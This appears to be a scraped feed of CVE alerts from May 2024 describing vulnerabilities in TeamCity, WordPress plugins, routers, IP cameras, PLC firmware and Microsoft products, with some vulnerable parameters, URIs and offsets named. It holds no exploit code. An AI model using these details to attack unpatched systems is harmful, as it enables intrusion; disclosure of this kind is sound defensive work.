🚨 CVE-2024-36367In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 stored XSS via third-party reports was possible🎖@cveNotify |
|
| 2024-05-29 15:37:50 |
🚨 CVE-2024-36365In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5, 2024.03.2 a third-party agent could impersonate a cloud agent🎖@cveNotify |
|
| 2024-05-29 15:37:49 |
🚨 CVE-2024-36364In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 improper access control in Pull Requests and Commit status publisher build features was possible🎖@cveNotify |
|
| 2024-05-29 15:37:46 |
🚨 CVE-2024-36363In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 several Stored XSS in code inspection reports were possible🎖@cveNotify |
|
| 2024-05-29 15:37:45 |
🚨 CVE-2024-25975The application implements an up- and downvote function which alters a value within a JSON file. The POST parameters are not filtered properly and therefore an arbitrary file can be overwritten. The file can be controlled by an authenticated attacker, the content cannot be controlled. It is possible to overwrite all files for which the webserver has write access. It is required to supply a relative path (path traversal).🎖@cveNotify |
|
| 2024-05-29 15:37:44 |
🚨 CVE-2024-5039The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-29 15:37:40 |
🚨 CVE-2024-25976When LDAP authentication is activated in the configuration it is possible to obtain reflected XSS execution by creating a custom URL that the victim only needs to open in order to execute arbitrary JavaScript code in the victim's browser. This is due to a fault in the file login.php where the content of "$_SERVER['PHP_SELF']" is reflected into the HTML of the website. Hence the attacker does not need a valid account in order to exploit this issue.🎖@cveNotify |
|
| 2024-05-29 15:37:39 |
🚨 CVE-2021-43890We have investigated reports of a spoofing vulnerability in AppX installer that affects Microsoft Windows. Microsoft is aware of attacks that attempt to exploit this vulnerability by using specially crafted packages that include the malware family known as Emotet/Trickbot/Bazaloader.An attacker could craft a malicious attachment to be used in phishing campaigns. The attacker would then have to convince the user to open the specially crafted attachment. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.Please see the Security Updates table for the link to the updated app. Alternatively you can download and install the Installer using the links provided in the FAQ section.Please see the Mitigations and Workaround sections for important information about steps you can take to protect your system from this vulnerability.December 27 2023 Update:In recent months, Microsoft Threat Intelligence has seen an increase in activity from threat actors leveraging social engineering and phishing techniques to target Windows OS users and utilizing the ms-appinstaller URI scheme.To address this increase in activity, we have updated the App Installer to disable the ms-appinstaller protocol by default and recommend other potential mitigations.🎖@cveNotify |
|
| 2024-05-29 14:38:14 |
🚨 CVE-2024-36378In JetBrains TeamCity before 2024.03.2 server was susceptible to DoS attacks with incorrect auth tokens🎖@cveNotify |
|
| 2024-05-29 14:38:13 |
🚨 CVE-2024-36376In JetBrains TeamCity before 2024.03.2 users could perform actions that should not be available to them based on their permissions🎖@cveNotify |
|
| 2024-05-29 14:38:12 |
🚨 CVE-2024-36374In JetBrains TeamCity before 2024.03.2 stored XSS via build step settings was possible🎖@cveNotify |
|
| 2024-05-29 14:38:08 |
🚨 CVE-2024-36372In JetBrains TeamCity before 2023.05.5 reflected XSS on the subscriptions page was possible🎖@cveNotify |
|
| 2024-05-29 14:38:07 |
🚨 CVE-2024-36370In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 stored XSS via OAuth connection settings was possible🎖@cveNotify |
|
| 2024-05-29 14:38:06 |
🚨 CVE-2024-36369In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 stored XSS via issue tracker integration was possible🎖@cveNotify |
|
| 2024-05-29 14:38:03 |
🚨 CVE-2024-36368In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 reflected XSS via OAuth provider configuration was possible🎖@cveNotify |
|
| 2024-05-29 14:38:02 |
🚨 CVE-2024-36366In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 an XSS could be executed via certain report grouping and filtering operations🎖@cveNotify |
|
| 2024-05-29 14:38:01 |
🚨 CVE-2024-36364In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 improper access control in Pull Requests and Commit status publisher build features was possible🎖@cveNotify |
|
| 2024-05-29 14:37:57 |
🚨 CVE-2024-36363In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 several Stored XSS in code inspection reports were possible🎖@cveNotify |
|
| 2024-05-29 14:37:56 |
🚨 CVE-2022-37968Microsoft has identified a vulnerability affecting the cluster connect feature of Azure Arc-enabled Kubernetes clusters. This vulnerability could allow an unauthenticated user to elevate their privileges and potentially gain administrative control over the Kubernetes cluster. Additionally, because Azure Stack Edge allows customers to deploy Kubernetes workloads on their devices via Azure Arc, Azure Stack Edge devices are also vulnerable to this vulnerability.🎖@cveNotify |
|
| 2024-05-29 14:37:55 |
🚨 CVE-2015-3281The buffer_slow_realign function in HAProxy 1.5.x before 1.5.14 and 1.6-dev does not properly realign a buffer that is used for pending outgoing data, which allows remote attackers to obtain sensitive information (uninitialized memory contents of previous requests) via a crafted request.🎖@cveNotify |
|
| 2024-05-29 13:38:24 |
🚨 CVE-2024-5185The EmbedAI application is susceptible to security issues that enable Data Poisoning attacks. This weakness could result in the application becoming compromised, leading to unauthorized entries or data poisoning attacks, which are delivered by a CSRF vulnerability due to the absence of a secure session management implementation and weak CORS policies weakness. An attacker can direct a user to a malicious webpage that exploits a CSRF vulnerability within the EmbedAI application. By leveraging this CSRF vulnerability, the attacker can deceive the user into inadvertently uploading and integrating incorrect data into the application’s language model.🎖@cveNotify |
|
| 2024-05-29 13:38:20 |
🚨 CVE-2024-25977The application does not change the session token when using the login or logout functionality. An attacker can set a session token in the victim's browser (e.g. via XSS) and prompt the victim to log in (e.g. via a redirect to the login page). This results in the victim's account being taken over.🎖@cveNotify |
|
| 2024-05-29 13:38:19 |
🚨 CVE-2023-42005IBM Db2 on Cloud Pak for Data and Db2 Warehouse on Cloud Pak for Data 3.5, 4.0, 4.5, 4.6, 4.7, and 4.8 could allow a user with access to the Kubernetes pod, to make system calls compromising the security of containers. IBM X-Force ID: 265264.🎖@cveNotify |
|
| 2024-05-29 13:38:18 |
🚨 CVE-2024-24851A heap-based buffer overflow vulnerability exists in the Programming Software Connection FiBurn functionality of AutomationDirect P3-550E 1.2.10.9. A specially crafted network packet can lead to a buffer overflow. An attacker can send an unauthenticated packet to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-29 13:38:14 |
🚨 CVE-2024-23315A read-what-where vulnerability exists in the Programming Software Connection IMM 01A1 Memory Read functionality of AutomationDirect P3-550E 1.2.10.9. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can send an unauthenticated packet to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-29 13:38:13 |
🚨 CVE-2023-26756The login page of Revive Adserver v5.4.1 is vulnerable to brute force attacks. NOTE: The vendor's position is that this is effectively mitigated by rate limits and password-quality features.🎖@cveNotify |
|
| 2024-05-29 13:08:41 |
🚨 CVE-2023-43845Aten PE6208 2.3.228 and 2.4.232 have default credentials for the privileged telnet account. The user is not asked to change the credentials after first login. If not changed, attackers can log in to the telnet console and gain administrator privileges.🎖@cveNotify |
|
| 2024-05-29 13:08:40 |
🚨 CVE-2023-43843Incorrect access control in the account management function of web interface in Aten PE6208 2.3.228 and 2.4.232 allows remote authenticated users to read user and administrator accounts passwords via HTTP GET request.🎖@cveNotify |
|
| 2024-05-29 13:08:39 |
🚨 CVE-2023-43842Incorrect access control in the account management function of web interface in Aten PE6208 2.3.228 and 2.4.232 allows remote authenticated users to alter user and administrator accounts credentials via HTTP POST request.🎖@cveNotify |
|
| 2024-05-29 13:08:35 |
🚨 CVE-2023-30305An issue discovered in Linksys E5600 routers allows attackers to hijack TCP sessions which could lead to a denial of service.🎖@cveNotify |
|
| 2024-05-29 13:08:34 |
🚨 CVE-2024-35563CDG-Server-V5.6.2.126.139 and earlier was discovered to contain a SQL injection vulnerability via the permissionId parameter in CDGTempPermissions.🎖@cveNotify |
|
| 2024-05-29 13:08:33 |
🚨 CVE-2024-35403TOTOLINK CP900L v4.1.5cu.798_B20221228 was discovered to contain a stack overflow via the desc parameter in the function setIpPortFilterRules🎖@cveNotify |
|
| 2024-05-29 13:08:30 |
🚨 CVE-2024-35401TOTOLINK CP900L v4.1.5cu.798_B20221228 was discovered to contain a command injection vulnerability via the FileName parameter in the UploadFirmwareFile function.🎖@cveNotify |
|
| 2024-05-29 13:08:29 |
🚨 CVE-2024-35343Certain Anpviz products allow unauthenticated users to download arbitrary files from the device's filesystem via a HTTP GET request to the /playback/ URI. This affects IPC-D250, IPC-D260, IPC-B850, IPC-D850, IPC-D350, IPC-D3150, IPC-D4250, IPC-D380, IPC-D880, IPC-D280, IPC-D3180, MC800N, YM500L, YM800N_N2, YMF50B, YM800SV2, YM500L8, and YM200E10 (IP Cameras) firmware v3.2.2.2 and lower and possibly more vendors/models of IP camera.🎖@cveNotify |
|
| 2024-05-29 13:08:28 |
🚨 CVE-2024-35341Certain Anpviz products allow unauthenticated users to download the running configuration of the device via a HTTP GET request to /ConfigFile.ini or /config.xml URIs. This configuration file contains usernames and encrypted passwords (encrypted with a hardcoded key common to all devices). This affects IPC-D250, IPC-D260, IPC-B850, IPC-D850, IPC-D350, IPC-D3150, IPC-D4250, IPC-D380, IPC-D880, IPC-D280, IPC-D3180, MC800N, YM500L, YM800N_N2, YMF50B, YM800SV2, YM500L8, and YM200E10 firmware v3.2.2.2 and lower and possibly more vendors/models of IP camera.🎖@cveNotify |
|
| 2024-05-29 13:08:24 |
🚨 CVE-2024-34852F-logic DataCube3 v1.0 is affected by command injection due to improper string filtering at the command execution point in the ./admin/transceiver_schedule.php file. An unauthenticated remote attacker can exploit this vulnerability by sending a file name containing command injection. Successful exploitation of this vulnerability may allow the attacker to execute system commands.🎖@cveNotify |
|
| 2024-05-29 13:08:23 |
🚨 CVE-2024-30164Amazon AWS Client VPN has a buffer overflow that could potentially allow a local actor to execute arbitrary commands with elevated permissions. This is resolved in 3.11.1 on Windows, 3.9.1 on macOS, and 3.12.1 on Linux. NOTE: although the macOS resolution is the same as for CVE-2024-30165, this vulnerability on macOS is not the same as CVE-2024-30165.🎖@cveNotify |
|
| 2024-05-29 13:08:22 |
🚨 CVE-2024-26024SUBNET Solutions Inc. has identified vulnerabilities in third-party components used in Substation Server.🎖@cveNotify |
|
| 2024-05-29 10:37:24 |
🚨 CVE-2024-28826Improper restriction of local upload and download paths in check_sftp in Checkmk before 2.3.0p4, 2.2.0p27, 2.1.0p44, and in Checkmk 2.0.0 (EOL) allows attackers with sufficient permissions to configure the check to read and write local files on the Checkmk site server.🎖@cveNotify |
|
| 2024-05-29 09:37:24 |
🚨 CVE-2024-3412The WP STAGING WordPress Backup Plugin – Migration Backup Restore plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wpstg_processing AJAX action in all versions up to, and including, 3.4.3. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-05-29 06:37:31 |
🚨 CVE-2024-3937The Playlist for Youtube WordPress plugin through 1.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-29 06:37:30 |
🚨 CVE-2024-3921The Gianism WordPress plugin through 5.1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-29 06:37:27 |
🚨 CVE-2024-3050The Site Reviews WordPress plugin before 7.0.0 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass IP-based blocking🎖@cveNotify |
|
| 2024-05-29 06:37:26 |
🚨 CVE-2024-26622In the Linux kernel, the following vulnerability has been resolved:tomoyo: fix UAF write bug in tomoyo_write_control()Since tomoyo_write_control() updates head->write_buf when write()of long lines is requested, we need to fetch head->write_buf afterhead->io_sem is held. Otherwise, concurrent write() requests cancause use-after-free-write and double-free problems.🎖@cveNotify |
|
| 2024-05-29 06:37:25 |
🚨 CVE-2024-26594In the Linux kernel, the following vulnerability has been resolved:ksmbd: validate mech token in session setupIf client send invalid mech token in session setup request, ksmbdvalidate and make the error if it is invalid.🎖@cveNotify |
|
| 2024-05-29 06:37:24 |
🚨 CVE-2024-26592In the Linux kernel, the following vulnerability has been resolved:ksmbd: fix UAF issue in ksmbd_tcp_new_connection()The race is between the handling of a new TCP connection andits disconnection. It leads to UAF on `struct tcp_transport` inksmbd_tcp_new_connection() function.🎖@cveNotify |
|
| 2024-05-29 05:37:25 |
🚨 CVE-2023-6743The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.5.89 via the template import functionality. This makes it possible for authenticated attackers, with contributor access and above, to execute code on the server.🎖@cveNotify |
|
| 2024-05-29 05:37:24 |
🚨 CVE-2024-5035The affected device expose a network service called "rftest" that is vulnerable to unauthenticated command injection on ports TCP/8888, TCP/8889, and TCP/8890. By successfully exploiting this flaw, remote unauthenticated attacker can gain arbitrary command execution on the device with elevated privileges.This issue affects Archer C4500X: through 1_1.1.6.🎖@cveNotify |
|
| 2024-05-29 04:38:03 |
🚨 CVE-2023-23405Remote Procedure Call Runtime Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:38:02 |
🚨 CVE-2023-23403Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:38:01 |
🚨 CVE-2023-23402Windows Media Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:58 |
🚨 CVE-2023-23401Windows Media Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:57 |
🚨 CVE-2023-23399Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:56 |
🚨 CVE-2023-23396Microsoft Excel Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:52 |
🚨 CVE-2023-23394Client Server Run-Time Subsystem (CSRSS) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:51 |
🚨 CVE-2023-23391Office for Android Spoofing Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:47 |
🚨 CVE-2023-23389Microsoft Defender Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:46 |
🚨 CVE-2023-23383Service Fabric Explorer Spoofing Vulnerability🎖@cveNotify |
|
| 2024-05-29 04:37:45 |
🚨 CVE-2023-21708Remote Procedure Call Runtime Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:43 |
🚨 CVE-2023-21555Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:42 |
🚨 CVE-2023-21551Microsoft Cryptographic Services Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:41 |
🚨 CVE-2023-21549Windows SMB Witness Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:37 |
🚨 CVE-2023-21547Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:36 |
🚨 CVE-2023-21543Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:35 |
🚨 CVE-2023-21542Windows Installer Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:32 |
🚨 CVE-2023-21540Windows Cryptographic Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:31 |
🚨 CVE-2023-21538.NET Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:30 |
🚨 CVE-2023-21536Event Tracing for Windows Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:26 |
🚨 CVE-2023-21531Azure Service Fabric Container Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-29 03:37:25 |
🚨 CVE-2023-21524Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-29 01:07:41 |
🚨 CVE-2024-5274Type Confusion in V8 in Google Chrome prior to 125.0.6422.112 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-29 00:37:43 |
🚨 CVE-2024-20682Windows Cryptographic Services Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:42 |
🚨 CVE-2024-20680Windows Message Queuing Client (MSMQC) Information Disclosure🎖@cveNotify |
|
| 2024-05-29 00:37:41 |
🚨 CVE-2024-20677A security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365. As of February 13, 2024, the ability to insert FBX files has also been disabled in 3D Viewer.3D models in Office documents that were previously inserted from a FBX file will continue to work as expected unless the Link to File option was chosen at insert time.This change is effective as of the January 9, 2024 security update.🎖@cveNotify |
|
| 2024-05-29 00:37:38 |
🚨 CVE-2024-20676Azure Storage Mover Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:37 |
🚨 CVE-2024-20662Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:36 |
🚨 CVE-2024-20661Microsoft Message Queuing Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:33 |
🚨 CVE-2024-20660Microsoft Message Queuing Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:32 |
🚨 CVE-2024-20656Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:31 |
🚨 CVE-2024-20655Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:28 |
🚨 CVE-2024-20654Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:27 |
🚨 CVE-2024-20652Windows HTML Platforms Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-29 00:37:26 |
🚨 CVE-2024-0057NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-28 23:37:24 |
🚨 CVE-2024-29049Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability🎖@cveNotify |
|
| 2024-05-28 22:37:32 |
🚨 CVE-2023-30314An issue discovered in 360 V6G, 360 T5G, 360 T6M, and 360 P1 routers allows attackers to hijack TCP sessions which could lead to a denial of service.🎖@cveNotify |
|
| 2024-05-28 22:37:25 |
🚨 CVE-2023-28301Microsoft Edge (Chromium-based) Tampering Vulnerability🎖@cveNotify |
|
| 2024-05-28 22:37:24 |
🚨 CVE-2023-24935Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-05-28 21:37:42 |
🚨 CVE-2024-0056Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-28 21:37:41 |
🚨 CVE-2023-24921Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2024-05-28 21:37:37 |
🚨 CVE-2023-24880Windows SmartScreen Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-28 21:37:36 |
🚨 CVE-2023-24856Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-05-28 21:37:32 |
🚨 CVE-2023-0841A vulnerability, which was classified as critical, has been found in GPAC 2.3-DEV-rev40-g3602a5ded. This issue affects the function mp3_dmx_process of the file filters/reframe_mp3.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221087.🎖@cveNotify |
|
| 2024-05-28 21:37:31 |
🚨 CVE-2023-21807Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2024-05-28 21:37:26 |
🚨 CVE-2021-42306An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application.Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.For more details on this issue, please refer to the MSRC Blog Entry.🎖@cveNotify |
|
| 2024-05-28 21:37:25 |
🚨 CVE-2020-1025An elevation of privilege vulnerability exists when Microsoft SharePoint Server and Skype for Business Server improperly handle OAuth token validation. An attacker who successfully exploited the vulnerability could bypass authentication and achieve improper access.To exploit this vulnerability, an attacker would need to modify the token.The update addresses the vulnerability by modifying how Microsoft SharePoint Server and Skype for Business Server validate tokens.🎖@cveNotify |
|
| 2024-05-28 20:37:25 |
🚨 CVE-2023-52440In the Linux kernel, the following vulnerability has been resolved:ksmbd: fix slub overflow in ksmbd_decode_ntlmssp_auth_blob()If authblob->SessionKey.Length is bigger than session keysize(CIFS_KEY_SIZE), slub overflow can happen in key exchange codes.cifs_arc4_crypt copy to session key array from SessionKey from client.🎖@cveNotify |
|
| 2024-05-28 20:37:24 |
🚨 CVE-2024-24267gpac v2.2.1 was discovered to contain a memory leak via the gfio_blob variable in the gf_fileio_from_blob function.🎖@cveNotify |
|
| 2024-05-28 18:37:33 |
🚨 CVE-2024-33402A SQL injection vulnerability in /model/approve_petty_cash.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the id parameter.🎖@cveNotify |
|
| 2024-05-28 18:37:32 |
🚨 CVE-2024-33411A SQL injection vulnerability in /model/get_admin_profile.php in Campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the my_index parameter.🎖@cveNotify |
|
| 2024-05-28 18:37:31 |
🚨 CVE-2024-33410SQL injection vulnerability in /model/delete_range_grade.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the id parameter.🎖@cveNotify |
|
| 2024-05-28 18:37:27 |
🚨 CVE-2024-33409SQL injection vulnerability in index.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the name parameter.🎖@cveNotify |
|
| 2024-05-28 18:37:26 |
🚨 CVE-2024-33406SQL injection vulnerability in /model/delete_student_grade_subject.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the index parameter.🎖@cveNotify |
|
| 2024-05-28 18:37:25 |
🚨 CVE-2024-33405SQL injection vulnerability in add_friends.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the friend_index parameter.🎖@cveNotify |
|
| 2024-05-28 18:37:24 |
🚨 CVE-2024-33403A SQL injection vulnerability in /model/get_events.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the event_id parameter.🎖@cveNotify |
|
| 2024-05-28 16:37:43 |
🚨 CVE-2024-33800A SQL injection vulnerability in /model/get_student1.php in campcodes Complete Web-Based School Management System 1.0 allows an attacker to execute arbitrary SQL commands via the index parameter.🎖@cveNotify |
|
| 2024-05-28 16:37:42 |
🚨 CVE-2024-30212If a SCSI READ(10) command is initiated via USB using the largest LBA (0xFFFFFFFF) with it's default block size of 512 and a count of 1,the first 512 byte of the 0x80000000 memory area is returned to the user. If the block count is increased, the full RAM can be exposed.The same method works to write to this memory area. If RAM contains pointers, those can be - depending on the application - overwritten toreturn data from any other offset including Progam and Boot Flash.🎖@cveNotify |
|
| 2024-05-28 16:37:41 |
🚨 CVE-2024-24962A stack-based buffer overflow vulnerability exists in the Programming Software Connection FileSelect functionality of AutomationDirect P3-550E 1.2.10.9. A specially crafted network packet can lead to stack-based buffer overflow. An attacker can send an unauthenticated packet to trigger this vulnerability.This CVE tracks the stack-based buffer overflow that occurs at offset `0xb6e98` of v1.2.10.9 of the P3-550E firmware.🎖@cveNotify |
|
| 2024-05-28 16:37:37 |
🚨 CVE-2024-24958Several out-of-bounds write vulnerabilities exist in the Programming Software Connection FileSystem API functionality of AutomationDirect P3-550E 1.2.10.9. Specially crafted network packets can lead to heap-based memory corruption. An attacker can send malicious packets to trigger these vulnerabilities.This CVE tracks the arbitrary null-byte write vulnerability located in firmware 1.2.10.9 of the P3-550E at offset `0xb6bdc`.🎖@cveNotify |
|
| 2024-05-28 16:37:36 |
🚨 CVE-2024-24955Several out-of-bounds write vulnerabilities exist in the Programming Software Connection FileSystem API functionality of AutomationDirect P3-550E 1.2.10.9. Specially crafted network packets can lead to heap-based memory corruption. An attacker can send malicious packets to trigger these vulnerabilities.This CVE tracks the arbitrary null-byte write vulnerability located in firmware 1.2.10.9 of the P3-550E at offset `0xb69fc`.🎖@cveNotify |
|
| 2024-05-28 16:37:32 |
🚨 CVE-2024-24954Several out-of-bounds write vulnerabilities exist in the Programming Software Connection FileSystem API functionality of AutomationDirect P3-550E 1.2.10.9. Specially crafted network packets can lead to heap-based memory corruption. An attacker can send malicious packets to trigger these vulnerabilities.This CVE tracks the arbitrary null-byte write vulnerability located in firmware 1.2.10.9 of the P3-550E at offset `0xb69c8`.🎖@cveNotify |
|
| 2024-05-28 16:37:31 |
🚨 CVE-2024-24946A heap-based buffer overflow vulnerability exists in the Programming Software Connection CurrDir functionality of AutomationDirect P3-550E 1.2.10.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger these vulnerability.This CVE tracks the heap corruption that occurs at offset `0xb686c` of version 1.2.10.9 of the P3-550E firmware, which occurs when a call to `memset` relies on an attacker-controlled length value and corrupts any trailing heap allocations.🎖@cveNotify |
|
| 2024-05-28 16:37:30 |
🚨 CVE-2024-23601A code injection vulnerability exists in the scan_lib.bin functionality of AutomationDirect P3-550E 1.2.10.9. A specially crafted scan_lib.bin can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-28 16:37:26 |
🚨 CVE-2024-22590The TLS engine in Kwik commit 745fd4e2 does not track the current state of the connection. This vulnerability can allow Client Hello messages to be overwritten at any time, including after a connection has been established.🎖@cveNotify |
|
| 2024-05-28 16:37:25 |
🚨 CVE-2024-21785A leftover debug code vulnerability exists in the Telnet Diagnostic Interface functionality of AutomationDirect P3-550E 1.2.10.9. A specially crafted series of network requests can lead to unauthorized access. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-28 16:37:24 |
🚨 CVE-2024-32978Kaminari is a paginator for web app frameworks and object relational mappings. A security vulnerability involving insecure file permissions has been identified in the Kaminari pagination library for Ruby on Rails, concerning insecure file permissions. This vulnerability is of moderate severity due to the potential for unauthorized write access to particular Ruby files managed by the library. Such access could lead to the alteration of application behavior or data integrity issues. Users of affected versions are advised to update to Kaminari version 0.16.2 or later, where file permissions have been adjusted to enhance security. If upgrading is not feasible immediately, review and adjust the file permissions for particular Ruby files in Kaminari to ensure they are only accessible by authorized user.🎖@cveNotify |
|
| 2024-05-28 15:08:20 |
🚨 CVE-2024-24685Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the parsing of comments within the vertex section of an `.off` file processed via the `readOFF` function.🎖@cveNotify |
|
| 2024-05-28 15:08:19 |
🚨 CVE-2024-24583Multiple out-of-bounds read vulnerabilities exist in the readMSH functionality of libigl v2.5.0. A specially crafted .msh file can lead to an out-of-bounds read. An attacker can provide a malicious file to trigger this vulnerability.This vulnerabilitty concerns the`readMSH` function while processing `MshLoader::ELEMENT_TRI` elements.🎖@cveNotify |
|
| 2024-05-28 15:08:18 |
🚨 CVE-2024-23951Multiple improper array index validation vulnerabilities exist in the readMSH functionality of libigl v2.5.0. A specially crafted .msh file can lead to an out-of-bounds write. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the `igl::MshLoader::parse_element_field` function while handling an `ascii`.msh` file.🎖@cveNotify |
|
| 2024-05-28 15:08:14 |
🚨 CVE-2024-23948Multiple improper array index validation vulnerabilities exist in the readMSH functionality of libigl v2.5.0. A specially crafted .msh file can lead to an out-of-bounds write. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the `igl::MshLoader::parse_nodes` function while handling an `ascii`.msh` file.🎖@cveNotify |
|
| 2024-05-28 15:08:13 |
🚨 CVE-2024-22181An out-of-bounds write vulnerability exists in the readNODE functionality of libigl v2.5.0. A specially crafted .node file can lead to an out-of-bounds write. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-28 15:08:09 |
🚨 CVE-2023-49600An out-of-bounds write vulnerability exists in the PlyFile ply_cast_ascii functionality of libigl v2.5.0. A specially crafted .ply file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-28 15:08:08 |
